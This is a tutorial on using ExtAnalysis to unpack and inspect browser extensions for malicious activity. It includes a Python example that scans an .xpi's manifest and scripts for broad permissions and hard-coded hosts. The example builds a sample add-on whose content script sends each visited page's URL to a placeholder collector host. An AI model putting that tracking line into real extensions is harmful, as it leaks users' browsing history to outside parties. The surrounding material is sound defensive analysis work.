How to Analyze Web Browser Extensions for Possible Malware & Other Malicious Activity

Browser extensions are extremely useful since they can expand web browsers like Google Chrome and Mozilla Firefox beyond their built-in features. However, we don't always know who's behind a browser add-on or what it's doing beyond what's advertised. That's where ExtAnalysis comes into play.

ExtAnalysis will unpack an extension so that we can see what's really going on inside. To start using it, you just need to use either Chrome or Firefox, as well as an extension you want to investigate for possible malicious background activities. We'll be examining a Firefox extension from a computer science student to see how a more amateurish add-on will leak its hidden intentions.


Chrome (or Brave) or Firefox
An installed or uninstalled extension from the Chrome Web Store or Firefox Add-ons
Linux or Windows PC (or macOS for uninstalled extensions only)

ExtAnalysis Features

ExtAnalysis is somewhat similar to Jupyter Notebook in that it's some Python code that will run, create a user interface, and open in a browser window. It's also a really interactive experience that lets us easily use the tool without relying on a particular piece of hardware or an operating system. It's cross-platform, easy to install, and straightforward to use.

ExtAnalysis can do a lot, such as running VirusTotal scans, running RetireJS vulnerability scans on JavaScript files, and viewing and editing HTML, JSON, JavaScript, and CSS files, but we're just going to give a general overview of what can be done from a simple scan.
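To make the "unpacking" idea concrete, here is an added example (not ExtAnalysis's code and not from the original article): a Firefox .xpi is a ZIP archive, so Python's zipfile module can read its manifest.json, list broad permissions, and pull hostnames out of the scripts. The BROAD list, the function names, and the sample add-on with its collector.example host are constructed for illustration.

```python
import io
import json
import re
import zipfile

# Permissions and match patterns that grant wide access (illustrative, not exhaustive).
BROAD = {"<all_urls>", "webRequest", "webRequestBlocking", "cookies", "history", "tabs"}
URL_RE = re.compile(rb"https?://[A-Za-z0-9.-]+")


def inspect_extension(data: bytes) -> dict:
    """Unpack an extension archive held in memory and summarize what it asks for."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        manifest = json.loads(z.read("manifest.json"))
        requested = set(manifest.get("permissions", []))
        requested |= set(manifest.get("host_permissions", []))
        # Content scripts declare the pages they are injected into.
        for cs in manifest.get("content_scripts", []):
            requested |= set(cs.get("matches", []))
        hosts = set()
        # Collect every hostname hard-coded in script or page files.
        for name in z.namelist():
            if name.endswith((".js", ".html")):
                for m in URL_RE.findall(z.read(name)):
                    hosts.add(m.split(b"//", 1)[1].decode().lower())
    return {
        "name": manifest.get("name"),
        "broad_permissions": sorted(requested & BROAD),
        "hosts": sorted(hosts),
    }


def build_sample_xpi() -> bytes:
    """Constructed sample: a tiny add-on whose script contacts a placeholder host."""
    manifest = {
        "manifest_version": 2,
        "name": "Sample Add-on",
        "version": "1.0",
        "permissions": ["tabs", "storage", "<all_urls>"],
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", json.dumps(manifest))
        z.writestr("content.js", 'fetch("https://collector.example/log?u=" + location.href);')
    return buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(inspect_extension(build_sample_xpi()), indent=2))
```

To inspect a real add-on, read the downloaded .xpi file as bytes and pass it to inspect_extension; hosts that have nothing to do with the advertised feature are the first thing to follow up on.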